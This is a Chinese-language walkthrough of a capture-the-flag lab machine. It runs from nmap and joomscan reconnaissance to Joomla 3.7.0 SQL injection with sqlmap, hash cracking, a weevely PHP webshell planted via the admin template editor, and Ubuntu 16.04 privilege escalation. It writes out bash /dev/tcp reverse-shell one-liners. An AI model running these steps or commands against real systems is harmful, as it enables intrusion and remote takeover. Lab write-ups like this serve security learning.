1.NMAP扫描子网

发现靶机ip地址，并且开放了80端口的http服务

2.搜集信息

首先访问web页面，发现使用了JoomlaCMS

使用joomscan发现Joomla的版本号和一些目录
（kali2.0好像已经不自带joomscan了，需要自己安装，apt-get install joomscan）
看了一遍目录信息无从下手，然后在exploit database找到了一个Joomla 3.7.0的sql注入漏洞利用

3.漏洞利用

用sqlmap开跑发现数据库名joomladb
继续查表


然后查列，在#__user_keys里没找到东西，在#__users里有些内容

然后直接取id name username password看看

用john**得到的hash加密的密码

4.登陆后台

使用之前joomscan返回的管理后台地址和注入得到的用户名密码登陆后台

发现可以编辑文件，且编辑的文件用户可访问

5.getshell

用weevely生成php木马

把shell.php中的源码复制到web页面创建一个新文件

使用weevely连接木马

根目录下没有内容，可能需要root权限进入root的家目录，于是查看系统版本

6.提权get flag

根据系统版本和内核版本查找提权漏洞。这里我试了很多，也查了很多大佬攻略，都提权失败了。准备找找原因成功了再来记录。

仔细研究了大佬们的攻略，找到了问题。提权前需要进行反弹shell，之前使用 bash -i >& /dev/tcp/[host ip]/[port] 0>&1 反弹shell失败，发现是要使用 bash -c ‘bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxx 0>&1’ 。需要指定使用bash执行后面的提权命令。

然后使用ubuntu 16.04的提权漏洞成功提权

这里提权用的poc也是学习了各大佬的攻略。
之前我在expliot-db里找到了很多ubuntu 16.04的提权漏洞poc，用msf尝试过很多poc都失败了。

msf利用CVE-2017-8917这个joomla的注入漏洞可以成功建立sessions


但是再使用ubuntu的提权poc就会失败，尝试了很多都一样。感觉还是哪里没有操作正确，需要思考一下。如果这种方法成功再来记录